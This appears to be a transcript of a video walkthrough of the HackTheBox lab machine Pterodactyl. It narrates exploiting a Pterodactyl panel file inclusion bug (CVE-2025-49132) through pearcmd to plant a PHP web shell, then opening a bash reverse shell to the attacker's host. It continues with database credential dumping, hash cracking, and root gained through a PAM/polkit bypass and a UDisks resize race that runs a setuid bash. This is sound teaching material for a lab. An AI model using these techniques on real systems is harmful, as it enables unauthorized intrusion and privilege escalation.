What's going on YouTube? This is Ipsec, and today we're doing Pterodactyl from HackTheBox, which is heavily CVE based, but it's nowhere near straightforward. It starts off with discovering the Pterodactyl panel, which I think is an open source game server management platform. I don't know exactly what it is. It has a local file inclusion vulnerability, but it's not straightforward to exploit because you have to discover where PHP PEAR is installed. And first you have to enumerate that that's the reason it's failing. But once you do that, you can get code execution on the box. And then the second prevest can be a little bit hard to find because it's an outdated library within PAM and something called UDISKS. The PAM vulnerability allows you to impersonate a physically logged in user. And then the UDISK permission, this is what auto mounts things when you like plug in a USB. It will auto mount it with the no set UID, so you can't have a set UID file on the USB drive. However, when it does a resize, it didn't keep that no set UID flag, so we can push a malicious file up there, tell UDISK to resize it, and when it does, it will mount it without no set UID, allowing a small raise condition where we can prevesc. So with that being said, let's jump in. As always, let's start off with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put it in the nmap directory and call it pterodactyl, and then the IP address of 10.129.38.135. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us is an open SSH server. The next thing we have is HTTP on port 80. Its banner tells us it's Nginx and also directing us to pterodactyl.htb. So let's go ahead and add this to our host file. So sudo v etc host. Then we can add 10.129.38.135. pterodactyl.htb, get rid of this typo, save that. And there's two other interesting things. First, we see closed on HTTPS and 8080. So this just means probably IP tables is configured to block. However, there is something else interesting here. We see 979 filtered ports. We see 4 ports here. That is not 1000. Nmap defaults to the top 1000 ports. We see 17 filtered with admin prohibited. So there's a second, there's two ways we're blocking ports, it seems like. This way, we're not seeing the results. So we probably have to rerun nmap and like verbose to actually see what admin prohibited ports are blocked. But I think it's just interesting that we have two different ways ports are being blocked here, right? Because this is 4 ports. It's not saying open or closed here. So 4 plus 17 would be 21. 21 plus 979 is 1000. So that is just interesting to me. Not exactly sure what those 17 ports are, but let's just go ahead and take a look at the page. So I'm going to go to http pterodactyl.htb, and we see it is a Minecraft server called Monitorland. We have copy server IP. If we click that, it says IP is copied to the clipboard. It actually put a domain name play.pterodactyl.htb, so we can go ahead and add this to the host file. So sudo v etc host. Then we can add, I don't know what 979 is, play.pterodactyl.htb, save that. And then if we try to go to play, let's copy this again, paste. That did not do it. Let's go http play.pterodactyl.htb. It just brings us back here. So this domain really didn't do anything. There is a changelog link, but before we start reading that, I'm just going to set up a virtual host brute force so we have something running in the background. I always like recon running in the background while I do other things. So let's do ffuf -u http pterodactyl.htb wordlist opt seclist discovery DNS subdomains top 1,000,000 2000. Yes. And then we can give it the host header because we want to do a virtual host brute force. So host, and then I think it's actually fuzz, not fuff, .pterodactyl.htb. And then let's just filter code 302. So while that runs, we can take a look at the changelog. We see version 1.20.x, the main website. It doesn't really look like too much information is here. We have reverse proxy for play. This didn't really seem to work. Over here, we have Pterodactyl panel version 1.11.10, and it has PHP with MySQL or MariaDB. And then looking at PHP capabilities, we see they're running PHP FPM, PHP PEAR, and then we also have some weird debugging via PHP info. So let's go ahead and take a look at Pterodactyl panel. So see exactly what this is. I actually think if we did, oh, nope. I was wondering if there was a link to Pterodactyl somewhere, but I'm just going to search Pterodactyl panel and we get to this, pterodactyl.io. Let's see. The Pterodactyl panel, we have GitHub, and we can start looking for vulnerabilities here. If we go back to our recon, we see there is a subdomain of panel. So let's do sudo v etc host. And then I'm going to replace play with panel because I don't want to type pterodactyl because there's probably a 50-50 chance I type that every time I attempt. So let's go ahead and see what panel.pterodactyl.htb is. We get the pterodactyl panel. And if we click on the software, we get back to this page, which we had seen. So this is open source software. We could try to enumerate the version of pterodactyl. And we already know kind of because it says version 1.11.10. When I was looking at enumerating it, because I always like just finding a programmatic way because we're not always going to have a changelog.txt, there wasn't a lot of like obvious JavaScript files this runs. One of my favorite things to do is like look at common JavaScript, go to the GitHub, and find out what commit that JavaScript file is through like SHA-1 or MD5 sums. I couldn't do it this way. There was something interesting that I never really thought about. I always thought these like bundle.whatever names, this bundle.807 ef3ce.javascript, I thought that'd be like unique to the server, like maybe it's React or whatever framework it is. It gets like all the files go to a computer, it gets compiled and generates this bundle. But this is also in some releases. So I had noticed if we go over to our releases, we know it's version 1.10. What version was it? 1.11.10. So I'm going to download that release and we'll download one other release. So we'll download this one. So let's go to assets. We can copy link, make dir, I'll call it versions, and then make dir 1.11.10. We'll wget, extract it, and then we wanted to look for that JavaScript file. So if I just do a find.grep, if I find.grep this, tar xvf panel. I should not have used 7-zip to extract it. There we go. We have this bundle. So let's do make dir 1.11. 1.11.11, I think is the next version up. I just want to show this bundle will actually change. So we'll download this one now. Go to assets, copy link, wget. Let's do tar zxvf. That should extract it correctly. Okay. Let's go back and do that exact same find command. And it's not there because that bundle is going to be something else, right? We do bundle star JS. That is now BD8441B2. So that's another way we could kind of fingerprint it. If we looked at the generated bundle name and then looked at all the releases, we could go back and eventually find out exactly what release it is. Thankfully, you don't have to do that because the changelog did tell you the exact thing. And then also, if we're looking for vulnerabilities, so let's just go to CVE details. Once we validate we're not a bot. And then we search pterodactyl. So I'm going to do pterodactyl. We'll also accept this so we can close the banner. There's really not many vulnerabilities in this software. So if we just look at the most recent one of 2025, we have one CVE, and it's saying prior to version 1.11.11. So you kind of just look at proof of concepts for this and throw it and see if it works. You don't really need to like find out exactly what version it is, because if you just look for exploits, there's only one choice. So all that recon isn't exactly needed. It is just still good to have, right? And we're going to step through this vulnerability manually. But before I do that, I do want to show like the proof of concept exploit script. So this is going to be the patch notes. It's a local file inclusion vulnerability. I'll just talk about this much later. Let's just go and find a good proof of concept script. So google.com, and we're going to search the CVE, which was 2025-49132. And no, I don't have that memorized. It is up here on a tab. Let's see. We can say GitHub POC, and we can look at a few of these. Let's see. I have a feeling I'm going to have trouble finding it because there are a lot of proof of concept exploits for this, and a lot of them are relatively basic or simple. Let's look at this one. Yeah, all this is doing is making a request, and it's trying to get probably the database information. We'll look at exactly how this works in probably 5-10 minutes, but it's just specifying the directory essentially and getting config database.php. Let's see. It was like yo-yo chod, I think is the repo I want. Yep, here it is. I like this exploit. It's relatively hard to read just because it has so much information there, but it goes over a lot of exploit primitives that we could potentially use with this to get RCE, right? It is the example we saw before this just leaked database credentials, but there's a lot of ways you can turn a file inclusion into an exploit. So that's why I want to show this one, just because it serves as a good talking point. So if we run the exploit.py, it wants the target. So let's do HTTP panel.pterodactyl.htb. And it outputs a lot of information. Let's see. There we go. Let's go Python 3, get to the top. So we see it tells us it's vulnerable. It gives us the database credentials. It gives us Redis credentials that are in it because it's reading all the config. It gives us the Laravel app key. If Laravel is really outdated, this is a 2018 CVE, so probably not applicable. You can do a deserialization attack against one of its cookies, such as like the cross-site request forgery checks, and get RCE that way. Again, it's not applicable because I think the version of Laravel is way out of date. More information from config files, like it's dumping pretty much the entire config of Pterodactyl. It's testing PEAR CMD. We know PEAR is installed based upon the changelog, and that's actually going to be how we get code execution, but it's in a different directory than is expecting, so it fails. PHP filter chain, this is like those I don't even know how to explain it real quick. If you go to ipsec.rocks and type PHP filter chain, you'll definitely get a few videos of using it. We have more Laravel deserialization attempts, but there is a lot. Like we also have PHP gadget chain collection. If we installed it, we could potentially exploit the deserialization that way. So what I was doing, I'm not going to do the filter chain. I'll show you like how I got tested the PHP gadget chain real quick because we don't show that often. This is like why so serial but for PHP. So let's go ahead and clone this. So we'll do a git clone, go in this, and that gives us a binary. So if we just do -L, it shows all the like frameworks that we can generate deserialization gadgets with. So I'm going to export path is equal to my current path, and then we're going to add the current working directory. So now that PHP GGC binary is in my path, so I can just execute it anywhere. And then if we run this exploit again, so if we do Python 3 exploit.py, we have to give it the pterodactyl. There we go. Now when this runs, we'll see a lot more of the Laravel exploitations, right? If we scroll up, did we? I was expecting to see like Laravel 1 through 10. Trying chain. It only tried one. Oh, we don't have PyCryptodome. So now we have to install yet another library. Let's do Python 3 mvm.vm to create the virtual environment. And then we can do source.vm bin activate, pip3 install, pycryptodome. And then I also need to probably install the request. And now when we run this again, I think we'll get what I'm expecting. Hopefully it goes and tries a bunch of various larvals. There we go. So it tried a bunch of chains. It didn't get code execution anywhere. So the one thing I noticed is like this exploit script only tries up to RCE10. But if we did PHP GGC-L, we see there's a lot more larvals in this chain now, right? It goes up to 22. So what I would do would be grep for like maybe larval and exploit.py, see how it's defined. We see a chains here. So I'm going to copy this. And then you could go in exploit.py, search Laravel RCE. And I would go ahead and just like add a bunch of them. So change this to a comma. And I'm not going to do this for the video because it would take a long time and we don't get anything. But I would just go and edit all this and go all the way up to, what was it, like 22? And then run it to see maybe if a more recent Laravel exploit chain would work. But it doesn't. If we did some research into the vulnerability, which we will do in a second, you'll see why this PHP PEAR is important. If we did a gobuster directory mode -u http pterodactyl.htb word list opsec list discovery web content raft small words .text, we'll change the extension to PHP and see if it finds anything. I probably should have started this earlier because, again, I always like having recon running in the background as I work, but it found PHP info relatively quickly, so let's just go ahead and take a look at it. So let's go pterodactyl.htb, PHP info, and then if we look, if we search for pair, we can see it's in user share PHP pair. So what we want to do is go back to the exploit script. Where is it? Here we go. We can do -h, look up for pair. There's a pair directory. If you don't know what pair is, it's like Composer, I think, an old version. What it does is helps with PHP library dependencies. But we do this and hopefully we get a hit. Who am I? There we go. RCE via pair CMD. So now we can actually run commands. So if we did a -h, there is a RCE-CMD flag. So if we just now specify --RCE CMD ID, it's going to go and run a command. So with this, we could get a shell, but we didn't really learn all that much, right? And we don't really understand why we need this pair directory or anything like that. If we had set this exploit script up to go through a proxy and examined it, we may go down the path of saying, oh, we need to change the pair path. But in reality, the way I found this is just through like looking at the exploit. So let's go ahead and close that, close this. Okay. So from the CVE, it has the commit where this was fixed. So what's in red is going to be what got removed in the patch, and this is what was added, right? So what was removed? Where we have this function invoke. It's going to take local request, and then we're going to assign local or locale, I don't know exactly how to pronounce that, and namespace to variables. And then what we're going to do is essentially call load, and this is going to be a Laravel function. So the load is Illuminate Contracts Translator Loader. So loading a file, we're going to give it local or locale. And then we're also going to give it the namespace, but replacing periods with slashes. So that is a load. The patch kind of does the same thing right here, right? It's calling load on that. But we can look it's got this additional code that's going to say locale and namespace can only be, this is lower alphanumeric, and this is going, oh, this is 2 characters. It could start a string, A through Z, end of string. So locale can only be 2 characters like EN or UK or things like that. This can be abbreviations of language. And then namespace, this has to be lower characters up to 192, I think. I think because 1 is included or something. Or maybe it's up to 191. But they got a length on namespace now. That is what's important, right? So they put some sanitization around these variables. Before the patch, there is no sanitization. So what is this doing? Well, we want to go into the Laravel source to pull up the loader. I can go Laravel framework, GitHub, search this. Okay. And then let's see. Come on. I think this is going to go into source, Illuminate. And then where was it? Is it translation loader? File loader.php. That sounds right. So we got the file loader and we called load. And let's see, we don't have a concept of group, I don't think. So we're probably giving it this, load paths. So loader is going to call load paths. If we look at load paths, we have it creating the path. So we got path, local, and then group. And now this is confusing, right? Because we called this namespace, right? Do I still have the source here? But this is just calling load, and we got 2 arguments in it. The second argument, local and group. This first argument is part of the actual load call where it pulls the path. So we pass namespace here. It's called group. That's fine. And then they add .php to the end. So this is why we have to always append .php. So now how to hit this function, right? We want to hit this local request. That's going to be in the local controller. And I'm just going to pull this repo down so we can do a git clone on this. CD panel. And then I want to look for local controller. So grep-r. And we can see this is going to be the code we've already looked at. We got routes base.php. So if I go in routes base.php, we can see that it's going to be right here, this local controller. We have to do a git on locals or locales. I'm going to pronounce that horribly all the time. And we're saying no middleware of authentication, and namespace can be anything. So this means we can hit it without authentication, and this lets us put any character we want into the URL. So if we hit like /account, it looks like maybe we don't need it, but we may need a count. I don't know exactly what that's doing. But if I go to panel.pterodactyl.htb and we hit random, I have to go to HTTP panel, give it random URLs, it directs us to auth login. But if we give it something that doesn't require authentication, let's try a /account. This is probably going to give us auth login, probably because we don't have the name account. I guess this is not requiring 2-factor authentication. But let's go here. Locals, local.json. There we go. It just returns. It's not directing us to auth login because it doesn't require authentication on this endpoint. And this is going to be where we can pass in various things, right? I think it was, what is the 2 variables we want? Local and namespace. So local is going to be, let's just send this over to Burp Suite so it's easier to play with. Let's go here. Proxy intercept is on. Send it. So local and then namespace is equal to. I'm going to do index because that's a file that almost always exists in PHP. If we do .. we don't get anything. Let's try another one. nothing, nothing, nothing. Oh, whoa, I don't know what I just did there. Nothing. I wonder if I do any URL encoding. Nothing. Let's try like var www HTML. And there we go. We get a page. So we've gone up a bunch of directories and then went into the HTML. And now we got a page back. So this is the local file inclusion. It is appending.php to us. So this is why we have to find a PHP script that we can weaponize, because now we can do a file include on a PHP script. What we can't do is actually like run commands directly. It's kind of like a GTFO or a GTFO bin or a lol bin, right? We could do PHP filter. I can't believe I'm blanking on this. PHP filter convert base 64, the actual syntax, because we can now convert PHP scripts into base 64 that lets us exfil it, right? Let's see. Let's search this again. PHP convert filter base 64. It's like PHP convert to base 64 and then / resource or something, right? PHP filter read. That should be it. Oh my God, websites are annoying. Okay. So we should be able to grab this. And how would we do this? I'm just thinking because it's putting the path here. So we don't want to do this because it's putting .. HTML. And if we do this, it definitely doesn't work because it's going to change the path to this, right? We can see this is what the path is. I wonder. I'm actually not sure if this is going to work now, but we'll try this. Put it up here. It doesn't look like we have access to do this, which is fine. There may be something else we could do, but let's look at weaponizing it. So exactly how do we include pair? So we put the directory as this, and then the namespace, we have to get a pair script, which I think is just pair. So if we do namespace as pair, I think that is referencing a script, but let's go ahead and say hacktricks, what is it? Pair local file inclusion PHP. And we should have a exploit primitive here with this already. So let's search this page for pair CMD URL tags. Here it is. So I'm going to grab this. And this is what we need. So we need index.php. Then we do a config create. So we'll put the config create there. We can put a and the file. And at the end, we give it this. I'm not sure if I did this correctly, but we'll see. I'm looking, glancing over. Let's see. Let's do system. And then request. I think if we just do 0 be the first argument. If we get a PHP error, we'll know. I don't think they had. I don't know if we need that semicolon. I'll call it pwn, and I'm going to change the directory to dev shm. So if I run this, user share PHP. Oh, we probably have to have a lot of .. slashes. right? Maybe. Pair, that should go. Let's see if this file now exists. So we want to get rid of config create. Local, we just want dev shm. And namespace will be pwn. That did not work because we may have pwn.php.php. We'll just give it dev shm pwn. Run this. Still nothing. Does this have to be %20? I don't think that really matters because that's in the argument, not exactly the URL portion. So local. Let's go URL encode this just in case that's the issue. Still nothing. Let's look back at the actual exploit script. So we do config create, file, user lib php. We're in the pair. Oh, it's pair cmd. Let's go and fix the namespace. Run this. There we go. Config create must have 2 paths. If we run this now, it doesn't work, but that is better because we at least know we're hitting pair cmd. I'm going to de-URL encode this and run it again. So it was the URL encode that actually broke it. It may not be like doing a URL decode, but we have something there. Now, if we hit this page, dev shm pwn, is that what we write? We do write that. Let's see, we do a git. Let's change this to be cmd. We'll give it pwn2. Pwn2. What if we can now do and cmd equals id? I don't know if we're writing to pwn2. Dev shm namespace. It appends.php here. Successfully created default configuration file. So we have created this. Get rid of that and there. Do we have too many ... slashes? Did we get like kind of lucky? Let's go ahead and copy this. Paste. I know this worked when I did it before. What am I changing? Let's change var dub HTML because we know this should work if we do index. That definitely works. It's just not liking dev shm. What if we change this to temp? Let's go here. Temp pwn2. Still not. Oh, wait. I'm an idiot sometimes. I bet it is. Let's go back to dev shm. I know what I did wrong. If we go back to the exploit, my mind, we are always adding .php to the end of our URL. We only add .php to the end of namespace. So I probably was creating dev shm pwn2, not pwn2.php. Save that. Now let's go here, dev shm pwn2, and we have a server error. This is what we want. So now I can do and cmd equals ID, run this, and now we have a command. So we can now, I wonder if I send it to a post. I don't think this is going to work, but maybe it will. I like doing post requests more. Method not allowed. Darn. Go back to Git. Now let's go ahead and get a reverse shell. So we can say bash-c, bash-i, dev tcp 10 10 15 8 9001 0 and 1, like that. And we have to encode this. So let's just do convert URL all characters. NC LVNP 9001, save that, run it, and boom, we get a shell. So let's update our shell. So we'll do Python 3, import pty spawn, bin bash, and then control Z, stty raw, minus echo, foreground, enter, enter. And we can say export term is equal to xterm, and that's going to let us clear the screen. Now, this prompt looks a little bit odd to me. I don't know exactly what it is, but I'm used to prompts looking differently. So I'm going to do a uname-a, and I don't see anything that identifies the distro or anything here. Like, I'm kind of curious about the prompt because it kind of looks like a jail prompt to me. I don't know why. That's just what it looks like. If we look at OS release, we can see it is OpenSUSE. So that's probably why it looks a little bit odd. Maybe that's also why like nmap behaves slightly differently because I'm just not used to looking at OpenSUSE machines. So, or maybe SUSE. I don't know exactly what it is, but yeah. So it goes, the very first thing I always like doing when I pop a web server is go for the database config. So I'm going to do config. Is it like a database.php? There is. Do we have credentials? If not, we can just run that exploit script to get them. But here we go. Databases panel. Username is pterodactyl. I don't see the password. Let's see. Come on. Exploit.py. We should be able to find it. When we run it. Where is that database password? Come on. There we go. ptera panel. Was that here? Let's see. grep this database grep-r. grep-r. It's in .env. So that's where it read it from. Okay. I don't know why I did not try that first. But if we look at the environment, we also have username, pterodactyl, database password of that. So MySQL-u pterodactyl-p. Put this. Did I typo something? I wonder if we can say -d panel. Is it capital D? Let's see. H for host 127.0.0.1. There we go. And that worked just because there's various ways you can authenticate with MySQL. There's the local database socket and then the network socket. Apparently they take different usernames. It's weird for MySQL, but yeah. So let's do show tables, select star from users. That is a lot of data. Let's just do describe users. I think we can actually do, let's do \G. There's only 2 users or 3 users. So that works. Head monitor, 2 users, but ID 3. Okay. I can just copy these manually. So let's go v hashes, paste that. And that user is head monitor. The next user is, oh, come on. Vilius Fog 3. And that password is going to be this. Okay. Let's copy this, and I'm going to go over to the Kraken to attempt to crack these. So copy, sh Kraken, and this is just a box I have on my network. I don't like cracking on my main computer just because I'm recording here and it's very CPU intensive, and it could lead to drop frames. I would not recommend cracking in a VM because VM cracking is very slow. Try to do it on your host computer. So let's see, hashcat hashes opt word list rocku. And we also have to tell it we gave it the username, .text. There we go. If I didn't specify the username, it wouldn't work just because I have the username : the password. And I always like storing my passwords that way, just because when it cracks, I like being able to know exactly what it went to without like taking the hash, grepping it against a file to figure that out. I just think it's more natural to put like username : hash, right? So once it initializes this runtime, it should go and crack relatively quickly. It is a bcrypt, so this is a relatively slow cracking process. You can see it's not even doing, oh, there we go, 1,000 hashes a second. But the password is relatively simple and near the top of rocku, so it gets it super quick. So let's go ahead and try SSHing as this. So that was the Phileas Fog3 user. And we can say @pterodactyl.htb, paste this password in, and we get logged in. Awesome. And this next part is really tough to find because it's a just missing patch. And I'm sure a lot of the recent exploits like copy fail or dirty frag also work to get it, but those were released after this box was created. So one hint would be if we looked at varspool mail and looked at our mail, we can see head monitor has sent mail to our user, and we see there's unusual activity from the UDISKS daemon. So if we look at this and say just UDISKS CVE, go over to Google, we can see there are a lot of recent vulnerabilities about this. And we're actually going to exploit two different CVEs. The first one is going to be like having policy kit impersonation. And we'll explain that in a second. I'm just trying to find a good POC to like stem off from. There were a lot of them on GitHub, but all of them are kind of just a bit wonky. Let's see. I wonder if I just search this CVE GitHub POC. Let's see. Do we have anything here? I don't think so. UDISK. That doesn't look like it. Let's see. UDISK Provesk POC GitHub. Maybe something like this. One specified OpenSUSE, so that's likely going to be it. Credison chain. Let's see. We have to do something with PAM. I just want to see if they do anything. They are not. Let's go here. Okay. So this is showing both of them. There's a 2025 CVE as well. And this is going to be an exploit within, I think it's PolicyKit, PK. I just want to kind of show this first. We're not going to do it like run any of the scripts. I think it's easier if we just run it this manually. So if I do action ID org free desktop UDISK2 loop setup, I want to say, and then process, and that is pretty much from this. I'm going to do and echo okay authorization. So dash, I think I did that right. What PolicyKit is like, so this whole exploit, the whole purpose of UDISK2, this is going to be what auto mounts USBs when you plug them into your computer. Now, mounting is a privileged task. You can't do that as a low privilege user. So what PolicyKit's going to do is going to say, oh, you're a graphical user. I'm going to make essentially a RPC call to the D bus and tell the D bus to go mount this device. And that's what's going to enable a low privilege user to do a privileged action to mount the device. Now, we're not a behind a keyboard. We're SSH'd in. So we're not passing this this policy kit check, right? So that's why this is failing. So what the exploit is we write to, what is it? It's like .pam_env or something. Yeah, we write to this file. So let's go ahead and copy this. And then we give it the xdg seat is equal to seat 0. And then we give it the xdg, what is the next one? It's like a v, this. Come on. Copy. Well, let's just paste. And that's equal to 1, so we override it. Save this. So I'm going to go ahead and copy this. Nothing happened here because we didn't reprocess his environment. So when I go and relog in, and I run this same command again, it gets okay. Because PAM, when it processed our user directory, it saw the PAM environment, and it loaded those environment variables, which is enough to trick the policy kit in order to say, hey, we're now a physical login. We're not SSH'd in, essentially. So that's why this is now passing. Now, the second vulnerability is going to be when we call resize, it's going to drop a set UID bit. That's the 2026 CVE. And it's easiest just to kind of walk through this manually. So I'm going to go back to my computer and I'm going to make a disk image. So we'll do sudo dd input file is going to be dev0 because we're nulling everything out. Output file, let's call this payload.image. The block size is going to be 1 megabyte. I think this is lowercase. I think it actually matters for this. And I want to say M is capital. And let's see, how big is bin bash? That is going to be 1 meg. So I'll make this 5 megs big. Okay, so if we do du-hs payload, that is a 5 meg file. So what we want to do here is make this a XFS directory or partition. So make fs file payload.image. Did I do that right? I thought I did. Device name is required. This error? It's too small. Minimum 4096. So let's do 20? What's the size? File system must be larger than 300 megs. Oh man, that's going to take a little while to copy up. There we go. That looks better. We have now made a XFS partition on this file. So we can say sudo mount, let's just do sudo make dir mount payload, sudo mount payload.image to mount payload. So if we go into this, now we're inside that image file we just created. So I'm going to scp Phileas fog3 at pterodactyl.htb. I'm going to copy user bin bash here. And I'm not going to use the bash on my system because my system is Debian based, OpenSUSE. I don't know what is. So I think there's a very real risk if I just use my bash and we get it to this computer that it just wouldn't work, right? Because it would be expecting a different libc version or something like that. So it's easiest just to copy the bash from the target. Let me see. I'm going to execute this bash. YOLO. Yeah, we can't. We have a different version of lib readline. So this is why I'm copying the bash from the target. We can do a sudo chown root on bash, and then sudo chmod 4755 on bash. And now we have a set UID inside of payload. So what I'm going to do is a sudo umount to unmount this. And we want to copy it to the box. So I'm going to do scp payload image Phileas fog3 at pterodactyl.htb. And then we want to give it the password. I'm so glad that password's somewhat easy to type. It's going to take a couple minutes to copy it up. But once we do, we're going to mount this payload and try to execute bash. And it's actually not going to work because by default, when UDISK does a mount, it gives it the no set UID permission. So it doesn't, like, that whole capability gets removed. Now, when we do a resize command, there's a race condition because when resize does it, it mounts it and it doesn't give it that no set UID. And that's what's going to enable us the ability to execute bash. So it's not going to take too long. We can start typing the command, I guess. So we do UDISKS loop setup, and I'm going to give it payload.image. So what this is going to do is mount it. I guess we could I don't want to do that. I was saying I could open up another SSH connection where we don't have the policy kit set up, so you could see this command errors, but then I have to remove pam-env and it could screw other things up. That's too much of risking like weird stability things. So I'm going to do this. Not found, look up. Wait, what? UDISKS. I thought that would do it. Do we have to give it the full path? Payload.image. Oh, UDISKS. Paste. There we go. So the device is now mapped as dev loop 0. So if we do a mount command, we can see. Oh, wait. We have to actually mount that. So we do UDISK loop setup, and we can say UDISKS mount dev loop 0. So now it has mounted this. And if we look at this directory, we can see bash does have that set UI. It doesn't actually. I thought it would show the permission but not allow us to execute, but it has. Oh, 4755. It does. I was expecting to see the special bit here. We can see it's got the set UID, but it's displaying it as it doesn't. And that is going to be because the no set UID permission. So if I do mount grep, let's do fill, we can see here's the mount XFS no set UID. Now the exploit comes because of the resize command. So to exploit this, we're going to need to have 2 sessions. So let's do SSH Filius fog3 at pterodactyl.htb. And let's just go ahead and log in. And I'm going to say while true, do temp. And it actually, when it resizes, mounts to block dev something. And bash, done. So now I'm just going to constantly, whoops, let's also add a -p. Because we need to tell bash to execute in privileged context. So it's just constantly going to do this. So when we call the resize command, soon as it like mounts this, it's going to execute bash and hopefully give us a shell. We just have to find that udev command, which is this. So it's going to be gdb call system. This should be fine. Object path. We called it, or it called it loop 0, I want to say. So we'll say loop 0. We say method resize. And we'll resize it to 0. So when we call this, hopefully we see a shell pop up in the bottom pane. GDB bus. T does not match. I don't know exactly what that is erroring at. Let's put this in quotes. T does not match. Let's go back here. I guess this could be part of it. I was just thinking that was like part of the actual code, but let's add this. There we go. It did a resize, but we did not call bash. That did not seem to like what we did. Let's try this again. And I'm going to recall the mount. So do loop setup. This was UDISKS. Loop 1. Let's try chaining this again. Loop 1. GDB bus. Wrong FS type. Loop 2. Do we have to mount? I think we may have screwed up the payload image. Let's see. Sudo. Oh, we don't want to do sudo. UDISKS ctl umount -b dev loop 0. Is it unmount? Unmounted 1. We don't have anything else mounted. We call this dev loop 3. Try this. There we go. We won the race. And now we have root as our effective UID. So if I go to /root, we have root.txt. So that is going to be the box. If we also look at mount, we can see dev loop 3 is mounted, block dev dot this random thing, and the no set UID is missing there because when it resizes, it doesn't remount it with that no set UID bit. So hope you guys enjoyed that. Take care, and I will see you all next time.